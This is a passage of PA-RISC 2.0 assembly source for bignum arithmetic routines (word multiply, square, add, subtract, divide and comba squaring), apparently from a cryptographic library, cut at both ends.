.proc
.callinfo frame=128
.entry
.EXPORT bn_mul_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
STD %r7,32(%sp) ; save r7
COPY %r0,%ret0 ; return 0 by default
DEPDI,Z 1,31,1,top_overflow ; top_overflow = 1 << 32
STD w,56(%sp) ; w on stack
CMPIB,>= 0,num,bn_mul_words_exit
LDO 128(%sp),%sp ; bump stack
;
; See if only 1 word to do, thus just do cleanup
;
CMPIB,= 1,num,bn_mul_words_single_top
FLDD -72(%sp),fw ; load up w into fp register fw (fw_h/fw_l)
;
; This loop is unrolled 2 times (64-byte aligned as well)
;
; PA-RISC 2.0 chips have two fully pipelined multipliers, thus
; two 32-bit mutiplies can be issued per cycle.
;
bn_mul_words_unroll2
FLDD 0(a_ptr),t_float_0 ; load up 64-bit value (fr8L) ht(L)/lt(R)
FLDD 8(a_ptr),t_float_1 ; load up 64-bit value (fr8L) ht(L)/lt(R)
XMPYU fht_0,fw_l,fm1 ; m1[0] = fht_0*fw_l
XMPYU fht_1,fw_l,fm1_1 ; m1[1] = ht*fw_l
FSTD fm1,-16(%sp) ; -16(sp) = m1
FSTD fm1_1,-48(%sp) ; -48(sp) = m1
XMPYU flt_0,fw_h,fm ; m = lt*fw_h
XMPYU flt_1,fw_h,fm_1 ; m = lt*fw_h
FSTD fm,-8(%sp) ; -8(sp) = m
FSTD fm_1,-40(%sp) ; -40(sp) = m
XMPYU fht_0,fw_h,ht_temp ; ht_temp = fht_0*fw_h
XMPYU fht_1,fw_h,ht_temp_1 ; ht_temp = ht*fw_h
FSTD ht_temp,-24(%sp) ; -24(sp) = ht
FSTD ht_temp_1,-56(%sp) ; -56(sp) = ht
XMPYU flt_0,fw_l,lt_temp ; lt_temp = lt*fw_l
XMPYU flt_1,fw_l,lt_temp_1 ; lt_temp = lt*fw_l
FSTD lt_temp,-32(%sp) ; -32(sp) = lt
FSTD lt_temp_1,-64(%sp) ; -64(sp) = lt
LDD -8(%sp),m_0
LDD -40(%sp),m_1
LDD -16(%sp),m1_0
LDD -48(%sp),m1_1
LDD -24(%sp),ht_0
LDD -56(%sp),ht_1
ADD,L m1_0,m_0,tmp_0 ; tmp_0 = m + m1;
ADD,L m1_1,m_1,tmp_1 ; tmp_1 = m + m1;
LDD -32(%sp),lt_0
LDD -64(%sp),lt_1
CMPCLR,*>>= tmp_0,m1_0, %r0 ; if (m < m1)
ADD,L ht_0,top_overflow,ht_0 ; ht += (1<<32)
CMPCLR,*>>= tmp_1,m1_1,%r0 ; if (m < m1)
ADD,L ht_1,top_overflow,ht_1 ; ht += (1<<32)
EXTRD,U tmp_0,31,32,m_0 ; m>>32
DEPD,Z tmp_0,31,32,m1_0 ; m1 = m<<32
EXTRD,U tmp_1,31,32,m_1 ; m>>32
DEPD,Z tmp_1,31,32,m1_1 ; m1 = m<<32
ADD,L ht_0,m_0,ht_0 ; ht+= (m>>32)
ADD,L ht_1,m_1,ht_1 ; ht+= (m>>32)
ADD lt_0,m1_0,lt_0 ; lt = lt+m1;
ADD,DC ht_0,%r0,ht_0 ; ht++
ADD lt_1,m1_1,lt_1 ; lt = lt+m1;
ADD,DC ht_1,%r0,ht_1 ; ht++
ADD %ret0,lt_0,lt_0 ; lt = lt + c (ret0);
ADD,DC ht_0,%r0,ht_0 ; ht++
ADD ht_0,lt_1,lt_1 ; lt = lt + c (ht_0)
ADD,DC ht_1,%r0,ht_1 ; ht++
STD lt_0,0(r_ptr) ; rp[0] = lt
STD lt_1,8(r_ptr) ; rp[1] = lt
COPY ht_1,%ret0 ; carry = ht
LDO -2(num),num ; num = num - 2;
LDO 16(a_ptr),a_ptr ; ap += 2
CMPIB,<= 2,num,bn_mul_words_unroll2
LDO 16(r_ptr),r_ptr ; rp++
CMPIB,=,N 0,num,bn_mul_words_exit ; are we done?
;
; Top of loop aligned on 64-byte boundary
;
bn_mul_words_single_top
FLDD 0(a_ptr),t_float_0 ; load up 64-bit value (fr8L) ht(L)/lt(R)
XMPYU fht_0,fw_l,fm1 ; m1 = ht*fw_l
FSTD fm1,-16(%sp) ; -16(sp) = m1
XMPYU flt_0,fw_h,fm ; m = lt*fw_h
FSTD fm,-8(%sp) ; -8(sp) = m
XMPYU fht_0,fw_h,ht_temp ; ht_temp = ht*fw_h
FSTD ht_temp,-24(%sp) ; -24(sp) = ht
XMPYU flt_0,fw_l,lt_temp ; lt_temp = lt*fw_l
FSTD lt_temp,-32(%sp) ; -32(sp) = lt
LDD -8(%sp),m_0
LDD -16(%sp),m1_0
ADD,L m_0,m1_0,tmp_0 ; tmp_0 = m + m1;
LDD -24(%sp),ht_0
LDD -32(%sp),lt_0
CMPCLR,*>>= tmp_0,m1_0,%r0 ; if (m < m1)
ADD,L ht_0,top_overflow,ht_0 ; ht += (1<<32)
EXTRD,U tmp_0,31,32,m_0 ; m>>32
DEPD,Z tmp_0,31,32,m1_0 ; m1 = m<<32
ADD,L ht_0,m_0,ht_0 ; ht+= (m>>32)
ADD lt_0,m1_0,lt_0 ; lt= lt+m1;
ADD,DC ht_0,%r0,ht_0 ; ht++
ADD %ret0,lt_0,lt_0 ; lt = lt + c;
ADD,DC ht_0,%r0,ht_0 ; ht++
COPY ht_0,%ret0 ; copy carry
STD lt_0,0(r_ptr) ; rp[0] = lt
bn_mul_words_exit
.EXIT
LDD -96(%sp),%r7 ; restore r7
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3 ; restore r3
.PROCEND ;in=23,24,25,26,29;out=28;
;----------------------------------------------------------------------------
;
;void bn_sqr_words(BN_ULONG *rp, BN_ULONG *ap, int num)
;
; arg0 = rp
; arg1 = ap
; arg2 = num
;
bn_sqr_words
.proc
.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_sqr_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.entry
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
NOP
STD %r5,16(%sp) ; save r5
CMPIB,>= 0,num,bn_sqr_words_exit
LDO 128(%sp),%sp ; bump stack
;
; If only 1, the goto straight to cleanup
;
CMPIB,= 1,num,bn_sqr_words_single_top
DEPDI,Z -1,32,33,high_mask ; Create Mask 0xffffffff80000000L
;
; This loop is unrolled 2 times (64-byte aligned as well)
;
bn_sqr_words_unroll2
FLDD 0(a_ptr),t_float_0 ; a[0]
FLDD 8(a_ptr),t_float_1 ; a[1]
XMPYU fht_0,flt_0,fm ; m[0]
XMPYU fht_1,flt_1,fm_1 ; m[1]
FSTD fm,-24(%sp) ; store m[0]
FSTD fm_1,-56(%sp) ; store m[1]
XMPYU flt_0,flt_0,lt_temp ; lt[0]
XMPYU flt_1,flt_1,lt_temp_1 ; lt[1]
FSTD lt_temp,-16(%sp) ; store lt[0]
FSTD lt_temp_1,-48(%sp) ; store lt[1]
XMPYU fht_0,fht_0,ht_temp ; ht[0]
XMPYU fht_1,fht_1,ht_temp_1 ; ht[1]
FSTD ht_temp,-8(%sp) ; store ht[0]
FSTD ht_temp_1,-40(%sp) ; store ht[1]
LDD -24(%sp),m_0
LDD -56(%sp),m_1
AND m_0,high_mask,tmp_0 ; m[0] & Mask
AND m_1,high_mask,tmp_1 ; m[1] & Mask
DEPD,Z m_0,30,31,m_0 ; m[0] << 32+1
DEPD,Z m_1,30,31,m_1 ; m[1] << 32+1
LDD -16(%sp),lt_0
LDD -48(%sp),lt_1
EXTRD,U tmp_0,32,33,tmp_0 ; tmp_0 = m[0]&Mask >> 32-1
EXTRD,U tmp_1,32,33,tmp_1 ; tmp_1 = m[1]&Mask >> 32-1
LDD -8(%sp),ht_0
LDD -40(%sp),ht_1
ADD,L ht_0,tmp_0,ht_0 ; ht[0] += tmp_0
ADD,L ht_1,tmp_1,ht_1 ; ht[1] += tmp_1
ADD lt_0,m_0,lt_0 ; lt = lt+m
ADD,DC ht_0,%r0,ht_0 ; ht[0]++
STD lt_0,0(r_ptr) ; rp[0] = lt[0]
STD ht_0,8(r_ptr) ; rp[1] = ht[1]
ADD lt_1,m_1,lt_1 ; lt = lt+m
ADD,DC ht_1,%r0,ht_1 ; ht[1]++
STD lt_1,16(r_ptr) ; rp[2] = lt[1]
STD ht_1,24(r_ptr) ; rp[3] = ht[1]
LDO -2(num),num ; num = num - 2;
LDO 16(a_ptr),a_ptr ; ap += 2
CMPIB,<= 2,num,bn_sqr_words_unroll2
LDO 32(r_ptr),r_ptr ; rp += 4
CMPIB,=,N 0,num,bn_sqr_words_exit ; are we done?
;
; Top of loop aligned on 64-byte boundary
;
bn_sqr_words_single_top
FLDD 0(a_ptr),t_float_0 ; load up 64-bit value (fr8L) ht(L)/lt(R)
XMPYU fht_0,flt_0,fm ; m
FSTD fm,-24(%sp) ; store m
XMPYU flt_0,flt_0,lt_temp ; lt
FSTD lt_temp,-16(%sp) ; store lt
XMPYU fht_0,fht_0,ht_temp ; ht
FSTD ht_temp,-8(%sp) ; store ht
LDD -24(%sp),m_0 ; load m
AND m_0,high_mask,tmp_0 ; m & Mask
DEPD,Z m_0,30,31,m_0 ; m << 32+1
LDD -16(%sp),lt_0 ; lt
LDD -8(%sp),ht_0 ; ht
EXTRD,U tmp_0,32,33,tmp_0 ; tmp_0 = m&Mask >> 32-1
ADD m_0,lt_0,lt_0 ; lt = lt+m
ADD,L ht_0,tmp_0,ht_0 ; ht += tmp_0
ADD,DC ht_0,%r0,ht_0 ; ht++
STD lt_0,0(r_ptr) ; rp[0] = lt
STD ht_0,8(r_ptr) ; rp[1] = ht
bn_sqr_words_exit
.EXIT
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3
.PROCEND ;in=23,24,25,26,29;out=28;
;----------------------------------------------------------------------------
;
;BN_ULONG bn_add_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
;
; arg0 = rp
; arg1 = ap
; arg2 = bp
; arg3 = n
t .reg %r22
b .reg %r21
l .reg %r20
bn_add_words
.proc
.entry
.callinfo
.EXPORT bn_add_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.align 64
CMPIB,>= 0,n,bn_add_words_exit
COPY %r0,%ret0 ; return 0 by default
;
; If 2 or more numbers do the loop
;
CMPIB,= 1,n,bn_add_words_single_top
NOP
;
; This loop is unrolled 2 times (64-byte aligned as well)
;
bn_add_words_unroll2
LDD 0(a_ptr),t
LDD 0(b_ptr),b
ADD t,%ret0,t ; t = t+c;
ADD,DC %r0,%r0,%ret0 ; set c to carry
ADD t,b,l ; l = t + b[0]
ADD,DC %ret0,%r0,%ret0 ; c+= carry
STD l,0(r_ptr)
LDD 8(a_ptr),t
LDD 8(b_ptr),b
ADD t,%ret0,t ; t = t+c;
ADD,DC %r0,%r0,%ret0 ; set c to carry
ADD t,b,l ; l = t + b[0]
ADD,DC %ret0,%r0,%ret0 ; c+= carry
STD l,8(r_ptr)
LDO -2(n),n
LDO 16(a_ptr),a_ptr
LDO 16(b_ptr),b_ptr
CMPIB,<= 2,n,bn_add_words_unroll2
LDO 16(r_ptr),r_ptr
CMPIB,=,N 0,n,bn_add_words_exit ; are we done?
bn_add_words_single_top
LDD 0(a_ptr),t
LDD 0(b_ptr),b
ADD t,%ret0,t ; t = t+c;
ADD,DC %r0,%r0,%ret0 ; set c to carry (could use CMPCLR??)
ADD t,b,l ; l = t + b[0]
ADD,DC %ret0,%r0,%ret0 ; c+= carry
STD l,0(r_ptr)
bn_add_words_exit
.EXIT
BVE (%rp)
NOP
.PROCEND ;in=23,24,25,26,29;out=28;
;----------------------------------------------------------------------------
;
;BN_ULONG bn_sub_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
;
; arg0 = rp
; arg1 = ap
; arg2 = bp
; arg3 = n
t1 .reg %r22
t2 .reg %r21
sub_tmp1 .reg %r20
sub_tmp2 .reg %r19
bn_sub_words
.proc
.callinfo
.EXPORT bn_sub_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.entry
.align 64
CMPIB,>= 0,n,bn_sub_words_exit
COPY %r0,%ret0 ; return 0 by default
;
; If 2 or more numbers do the loop
;
CMPIB,= 1,n,bn_sub_words_single_top
NOP
;
; This loop is unrolled 2 times (64-byte aligned as well)
;
bn_sub_words_unroll2
LDD 0(a_ptr),t1
LDD 0(b_ptr),t2
SUB t1,t2,sub_tmp1 ; t3 = t1-t2;
SUB sub_tmp1,%ret0,sub_tmp1 ; t3 = t3- c;
CMPCLR,*>> t1,t2,sub_tmp2 ; clear if t1 > t2
LDO 1(%r0),sub_tmp2
CMPCLR,*= t1,t2,%r0
COPY sub_tmp2,%ret0
STD sub_tmp1,0(r_ptr)
LDD 8(a_ptr),t1
LDD 8(b_ptr),t2
SUB t1,t2,sub_tmp1 ; t3 = t1-t2;
SUB sub_tmp1,%ret0,sub_tmp1 ; t3 = t3- c;
CMPCLR,*>> t1,t2,sub_tmp2 ; clear if t1 > t2
LDO 1(%r0),sub_tmp2
CMPCLR,*= t1,t2,%r0
COPY sub_tmp2,%ret0
STD sub_tmp1,8(r_ptr)
LDO -2(n),n
LDO 16(a_ptr),a_ptr
LDO 16(b_ptr),b_ptr
CMPIB,<= 2,n,bn_sub_words_unroll2
LDO 16(r_ptr),r_ptr
CMPIB,=,N 0,n,bn_sub_words_exit ; are we done?
bn_sub_words_single_top
LDD 0(a_ptr),t1
LDD 0(b_ptr),t2
SUB t1,t2,sub_tmp1 ; t3 = t1-t2;
SUB sub_tmp1,%ret0,sub_tmp1 ; t3 = t3- c;
CMPCLR,*>> t1,t2,sub_tmp2 ; clear if t1 > t2
LDO 1(%r0),sub_tmp2
CMPCLR,*= t1,t2,%r0
COPY sub_tmp2,%ret0
STD sub_tmp1,0(r_ptr)
bn_sub_words_exit
.EXIT
BVE (%rp)
NOP
.PROCEND ;in=23,24,25,26,29;out=28;
;------------------------------------------------------------------------------
;
; unsigned long bn_div_words(unsigned long h, unsigned long l, unsigned long d)
;
; arg0 = h
; arg1 = l
; arg2 = d
;
; This is mainly just modified assembly from the compiler, thus the
; lack of variable names.
;
;------------------------------------------------------------------------------
bn_div_words
.proc
.callinfo CALLER,FRAME=272,ENTRY_GR=%r10,SAVE_RP,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_div_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.IMPORT BN_num_bits_word,CODE,NO_RELOCATION
.IMPORT __iob,DATA
.IMPORT fprintf,CODE,NO_RELOCATION
.IMPORT abort,CODE,NO_RELOCATION
.IMPORT $$div2U,MILLICODE
.entry
STD %r2,-16(%r30)
STD,MA %r3,352(%r30)
STD %r4,-344(%r30)
STD %r5,-336(%r30)
STD %r6,-328(%r30)
STD %r7,-320(%r30)
STD %r8,-312(%r30)
STD %r9,-304(%r30)
STD %r10,-296(%r30)
STD %r27,-288(%r30) ; save gp
COPY %r24,%r3 ; save d
COPY %r26,%r4 ; save h (high 64-bits)
LDO -1(%r0),%ret0 ; return -1 by default
CMPB,*= %r0,%arg2,$D3 ; if (d == 0)
COPY %r25,%r5 ; save l (low 64-bits)
LDO -48(%r30),%r29 ; create ap
.CALL ;in=26,29;out=28;
B,L BN_num_bits_word,%r2
COPY %r3,%r26
LDD -288(%r30),%r27 ; restore gp
LDI 64,%r21
CMPB,= %r21,%ret0,$00000012 ;if (i == 64) (forward)
COPY %ret0,%r24 ; i
MTSARCM %r24
DEPDI,Z -1,%sar,1,%r29
CMPB,*<<,N %r29,%r4,bn_div_err_case ; if (h > 1<<i) (forward)
$00000012
SUBI 64,%r24,%r31 ; i = 64 - i;
CMPCLR,*<< %r4,%r3,%r0 ; if (h >= d)
SUB %r4,%r3,%r4 ; h -= d
CMPB,= %r31,%r0,$0000001A ; if (i)
COPY %r0,%r10 ; ret = 0
MTSARCM %r31 ; i to shift
DEPD,Z %r3,%sar,64,%r3 ; d <<= i;
SUBI 64,%r31,%r19 ; 64 - i; redundent
MTSAR %r19 ; (64 -i) to shift
SHRPD %r4,%r5,%sar,%r4 ; l>> (64-i)
MTSARCM %r31 ; i to shift
DEPD,Z %r5,%sar,64,%r5 ; l <<= i;
$0000001A
DEPDI,Z -1,31,32,%r19
EXTRD,U %r3,31,32,%r6 ; dh=(d&0xfff)>>32
EXTRD,U %r3,63,32,%r8 ; dl = d&0xffffff
LDO 2(%r0),%r9
STD %r3,-280(%r30) ; "d" to stack
$0000001C
DEPDI,Z -1,63,32,%r29 ;
EXTRD,U %r4,31,32,%r31 ; h >> 32
CMPB,*=,N %r31,%r6,$D2 ; if ((h>>32) != dh)(forward) div
COPY %r4,%r26
EXTRD,U %r4,31,32,%r25
COPY %r6,%r24
.CALL ;in=23,24,25,26;out=20,21,22,28,29; (MILLICALL)
B,L $$div2U,%r2
EXTRD,U %r6,31,32,%r23
DEPD %r28,31,32,%r29
$D2
STD %r29,-272(%r30) ; q
AND %r5,%r19,%r24 ; t & 0xffffffff00000000;
EXTRD,U %r24,31,32,%r24 ; ???
FLDD -272(%r30),%fr7 ; q
FLDD -280(%r30),%fr8 ; d
XMPYU %fr8L,%fr7L,%fr10
FSTD %fr10,-256(%r30)
XMPYU %fr8L,%fr7R,%fr22
FSTD %fr22,-264(%r30)
XMPYU %fr8R,%fr7L,%fr11
XMPYU %fr8R,%fr7R,%fr23
FSTD %fr11,-232(%r30)
FSTD %fr23,-240(%r30)
LDD -256(%r30),%r28
DEPD,Z %r28,31,32,%r2
LDD -264(%r30),%r20
ADD,L %r20,%r2,%r31
LDD -232(%r30),%r22
DEPD,Z %r22,31,32,%r22
LDD -240(%r30),%r21
B $00000024 ; enter loop
ADD,L %r21,%r22,%r23
$0000002A
LDO -1(%r29),%r29
SUB %r23,%r8,%r23
$00000024
SUB %r4,%r31,%r25
AND %r25,%r19,%r26
CMPB,*<>,N %r0,%r26,$00000046 ; (forward)
DEPD,Z %r25,31,32,%r20
OR %r20,%r24,%r21
CMPB,*<<,N %r21,%r23,$0000002A ;(backward)
SUB %r31,%r6,%r31
;-------------Break path---------------------
$00000046
DEPD,Z %r23,31,32,%r25 ;tl
EXTRD,U %r23,31,32,%r26 ;t
AND %r25,%r19,%r24 ;tl = (tl<<32)&0xfffffff0000000L
ADD,L %r31,%r26,%r31 ;th += t;
CMPCLR,*>>= %r5,%r24,%r0 ;if (l<tl)
LDO 1(%r31),%r31 ; th++;
CMPB,*<<=,N %r31,%r4,$00000036 ;if (n < th) (forward)
LDO -1(%r29),%r29 ;q--;
ADD,L %r4,%r3,%r4 ;h += d;
$00000036
ADDIB,=,N -1,%r9,$D1 ;if (--count == 0) break (forward)
SUB %r5,%r24,%r28 ; l -= tl;
SUB %r4,%r31,%r24 ; h -= th;
SHRPD %r24,%r28,32,%r4 ; h = ((h<<32)|(l>>32));
DEPD,Z %r29,31,32,%r10 ; ret = q<<32
b $0000001C
DEPD,Z %r28,31,32,%r5 ; l = l << 32
$D1
OR %r10,%r29,%r28 ; ret |= q
$D3
LDD -368(%r30),%r2
$D0
LDD -296(%r30),%r10
LDD -304(%r30),%r9
LDD -312(%r30),%r8
LDD -320(%r30),%r7
LDD -328(%r30),%r6
LDD -336(%r30),%r5
LDD -344(%r30),%r4
BVE (%r2)
.EXIT
LDD,MB -352(%r30),%r3
bn_div_err_case
MFIA %r6
ADDIL L'bn_div_words-bn_div_err_case,%r6,%r1
LDO R'bn_div_words-bn_div_err_case(%r1),%r6
ADDIL LT'__iob,%r27,%r1
LDD RT'__iob(%r1),%r26
ADDIL L'C$4-bn_div_words,%r6,%r1
LDO R'C$4-bn_div_words(%r1),%r25
LDO 64(%r26),%r26
.CALL ;in=24,25,26,29;out=28;
B,L fprintf,%r2
LDO -48(%r30),%r29
LDD -288(%r30),%r27
.CALL ;in=29;
B,L abort,%r2
LDO -48(%r30),%r29
LDD -288(%r30),%r27
B $D0
LDD -368(%r30),%r2
.PROCEND ;in=24,25,26,29;out=28;
;----------------------------------------------------------------------------
;
; Registers to hold 64-bit values to manipulate. The "L" part
; of the register corresponds to the upper 32-bits, while the "R"
; part corresponds to the lower 32-bits
;
; Note, that when using b6 and b7, the code must save these before
; using them because they are callee save registers
;
;
; Floating point registers to use to save values that
; are manipulated. These don't collide with ftemp1-6 and
; are all caller save registers
;
a0 .reg %fr22
a0L .reg %fr22L
a0R .reg %fr22R
a1 .reg %fr23
a1L .reg %fr23L
a1R .reg %fr23R
a2 .reg %fr24
a2L .reg %fr24L
a2R .reg %fr24R
a3 .reg %fr25
a3L .reg %fr25L
a3R .reg %fr25R
a4 .reg %fr26
a4L .reg %fr26L
a4R .reg %fr26R
a5 .reg %fr27
a5L .reg %fr27L
a5R .reg %fr27R
a6 .reg %fr28
a6L .reg %fr28L
a6R .reg %fr28R
a7 .reg %fr29
a7L .reg %fr29L
a7R .reg %fr29R
b0 .reg %fr30
b0L .reg %fr30L
b0R .reg %fr30R
b1 .reg %fr31
b1L .reg %fr31L
b1R .reg %fr31R
;
; Temporary floating point variables, these are all caller save
; registers
;
ftemp1 .reg %fr4
ftemp2 .reg %fr5
ftemp3 .reg %fr6
ftemp4 .reg %fr7
;
; The B set of registers when used.
;
b2 .reg %fr8
b2L .reg %fr8L
b2R .reg %fr8R
b3 .reg %fr9
b3L .reg %fr9L
b3R .reg %fr9R
b4 .reg %fr10
b4L .reg %fr10L
b4R .reg %fr10R
b5 .reg %fr11
b5L .reg %fr11L
b5R .reg %fr11R
b6 .reg %fr12
b6L .reg %fr12L
b6R .reg %fr12R
b7 .reg %fr13
b7L .reg %fr13L
b7R .reg %fr13R
c1 .reg %r21 ; only reg
temp1 .reg %r20 ; only reg
temp2 .reg %r19 ; only reg
temp3 .reg %r31 ; only reg
m1 .reg %r28
c2 .reg %r23
high_one .reg %r1
ht .reg %r6
lt .reg %r5
m .reg %r4
c3 .reg %r3
SQR_ADD_C .macro A0L,A0R,C1,C2,C3
XMPYU A0L,A0R,ftemp1 ; m
FSTD ftemp1,-24(%sp) ; store m
XMPYU A0R,A0R,ftemp2 ; lt
FSTD ftemp2,-16(%sp) ; store lt
XMPYU A0L,A0L,ftemp3 ; ht
FSTD ftemp3,-8(%sp) ; store ht
LDD -24(%sp),m ; load m
AND m,high_mask,temp2 ; m & Mask
DEPD,Z m,30,31,temp3 ; m << 32+1
LDD -16(%sp),lt ; lt
LDD -8(%sp),ht ; ht
EXTRD,U temp2,32,33,temp1 ; temp1 = m&Mask >> 32-1
ADD temp3,lt,lt ; lt = lt+m
ADD,L ht,temp1,ht ; ht += temp1
ADD,DC ht,%r0,ht ; ht++
ADD C1,lt,C1 ; c1=c1+lt
ADD,DC ht,%r0,ht ; ht++
ADD C2,ht,C2 ; c2=c2+ht
ADD,DC C3,%r0,C3 ; c3++
.endm
SQR_ADD_C2 .macro A0L,A0R,A1L,A1R,C1,C2,C3
XMPYU A0L,A1R,ftemp1 ; m1 = bl*ht
FSTD ftemp1,-16(%sp) ;
XMPYU A0R,A1L,ftemp2 ; m = bh*lt
FSTD ftemp2,-8(%sp) ;
XMPYU A0R,A1R,ftemp3 ; lt = bl*lt
FSTD ftemp3,-32(%sp)
XMPYU A0L,A1L,ftemp4 ; ht = bh*ht
FSTD ftemp4,-24(%sp) ;
LDD -8(%sp),m ; r21 = m
LDD -16(%sp),m1 ; r19 = m1
ADD,L m,m1,m ; m+m1
DEPD,Z m,31,32,temp3 ; (m+m1<<32)
LDD -24(%sp),ht ; r24 = ht
CMPCLR,*>>= m,m1,%r0 ; if (m < m1)
ADD,L ht,high_one,ht ; ht+=high_one
EXTRD,U m,31,32,temp1 ; m >> 32
LDD -32(%sp),lt ; lt
ADD,L ht,temp1,ht ; ht+= m>>32
ADD lt,temp3,lt ; lt = lt+m1
ADD,DC ht,%r0,ht ; ht++
ADD ht,ht,ht ; ht=ht+ht;
ADD,DC C3,%r0,C3 ; add in carry (c3++)
ADD lt,lt,lt ; lt=lt+lt;
ADD,DC ht,%r0,ht ; add in carry (ht++)
ADD C1,lt,C1 ; c1=c1+lt
ADD,DC,*NUV ht,%r0,ht ; add in carry (ht++)
LDO 1(C3),C3 ; bump c3 if overflow,nullify otherwise
ADD C2,ht,C2 ; c2 = c2 + ht
ADD,DC C3,%r0,C3 ; add in carry (c3++)
.endm
;
;void bn_sqr_comba8(BN_ULONG *r, BN_ULONG *a)
; arg0 = r_ptr
; arg1 = a_ptr
;
bn_sqr_comba8
.PROC
.CALLINFO FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_sqr_comba8,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.ENTRY
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
;
; Zero out carries
;
COPY %r0,c1
COPY %r0,c2
COPY %r0,c3
LDO 128(%sp),%sp ; bump stack
DEPDI,Z -1,32,33,high_mask ; Create Mask 0xffffffff80000000L
DEPDI,Z 1,31,1,high_one ; Create Value 1 << 32
;
; Load up all of the values we are going to use
;
FLDD 0(a_ptr),a0
FLDD 8(a_ptr),a1
FLDD 16(a_ptr),a2
FLDD 24(a_ptr),a3
FLDD 32(a_ptr),a4
FLDD 40(a_ptr),a5
FLDD 48(a_ptr),a6
FLDD 56(a_ptr),a7
SQR_ADD_C a0L,a0R,c1,c2,c3
STD c1,0(r_ptr) ; r[0] = c1;
COPY %r0,c1
SQR_ADD_C2 a1L,a1R,a0L,a0R,c2,c3,c1
STD c2,8(r_ptr) ; r[1] = c2;
COPY %r0,c2
SQR_ADD_C a1L,a1R,c3,c1,c2
SQR_ADD_C2 a2L,a2R,a0L,a0R,c3,c1,c2
STD c3,16(r_ptr) ; r[2] = c3;
COPY %r0,c3
SQR_ADD_C2 a3L,a3R,a0L,a0R,c1,c2,c3
SQR_ADD_C2 a2L,a2R,a1L,a1R,c1,c2,c3
STD c1,24(r_ptr) ; r[3] = c1;
COPY %r0,c1
SQR_ADD_C a2L,a2R,c2,c3,c1
SQR_ADD_C2 a3L,a3R,a1L,a1R,c2,c3,c1
SQR_ADD_C2 a4L,a4R,a0L,a0R,c2,c3,c1
STD c2,32(r_ptr) ; r[4] = c2;
COPY %r0,c2
SQR_ADD_C2 a5L,a5R,a0L,a0R,c3,c1,c2
SQR_ADD_C2 a4L,a4R,a1L,a1R,c3,c1,c2
SQR_ADD_C2 a3L,a3R,a2L,a2R,c3,c1,c2
STD c3,40(r_ptr) ; r[5] = c3;
COPY %r0,c3
SQR_ADD_C a3L,a3R,c1,c2,c3
SQR_ADD_C2 a4L,a4R,a2L,a2R,c1,c2,c3
SQR_ADD_C2 a5L,a5R,a1L,a1R,c1,c2,c3
SQR_ADD_C2 a6L,a6R,a0L,a0R,c1,c2,c3
STD c1,48(r_ptr) ; r[6] = c1;
COPY %r0,c1
SQR_ADD_C2 a7L,a7R,a0L,a0R,c2,c3,c1
SQR_ADD_C2 a6L,a6R,a1L,a1R,c2,c3,c1
SQR_ADD_C2 a5L,a5R,a2L,a2R,c2,c3,c1
SQR_ADD_C2 a4L,a4R,a3L,a3R,c2,c3,c1
STD c2,56(r_ptr) ; r[7] = c2;
COPY %r0,c2
SQR_ADD_C a4L,a4R,c3,c1,c2
SQR_ADD_C2 a5L,a5R,a3L,a3R,c3,c1,c2
SQR_ADD_C2 a6L,a6R,a2L,a2R,c3,c1,c2
SQR_ADD_C2 a7L,a7R,a1L,a1R,c3,c1,c2
STD c3,64(r_ptr) ; r[8] = c3;
COPY %r0,c3
SQR_ADD_C2 a7L,a7R,a2L,a2R,c1,c2,c3
SQR_ADD_C2 a6L,a6R,a3L,a3R,c1,c2,c3
SQR_ADD_C2 a5L,a5R,a4L,a4R,c1,c2,c3
STD c1,72(r_ptr) ; r[9] = c1;
COPY %r0,c1
SQR_ADD_C a5L,a5R,c2,c3,c1
SQR_ADD_C2 a6L,a6R,a4L,a4R,c2,c3,c1
SQR_ADD_C2 a7L,a7R,a3L,a3R,c2,c3,c1
STD c2,80(r_ptr) ; r[10] = c2;
COPY %r0,c2
SQR_ADD_C2 a7L,a7R,a4L,a4R,c3,c1,c2
SQR_ADD_C2 a6L,a6R,a5L,a5R,c3,c1,c2
STD c3,88(r_ptr) ; r[11] = c3;
COPY %r0,c3
SQR_ADD_C a6L,a6R,c1,c2,c3
SQR_ADD_C2 a7L,a7R,a5L,a5R,c1,c2,c3
STD c1,96(r_ptr) ; r[12] = c1;
COPY %r0,c1
SQR_ADD_C2 a7L,a7R,a6L,a6R,c2,c3,c1
STD c2,104(r_ptr) ; r[13] = c2;
COPY %r0,c2
SQR_ADD_C a7L,a7R,c3,c1,c2
STD c3, 112(r_ptr) ; r[14] = c3
STD c1, 120(r_ptr) ; r[15] = c1
.EXIT
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3
.PROCEND
;-----------------------------------------------------------------------------
;
;void bn_sqr_comba4(BN_ULONG *r, BN_ULONG *a)
; arg0 = r_ptr
; arg1 = a_ptr
;
bn_sqr_comba4
.proc
.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_sqr_comba4,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.entry
.align 64
STD %r3,0(%sp) ; save r3
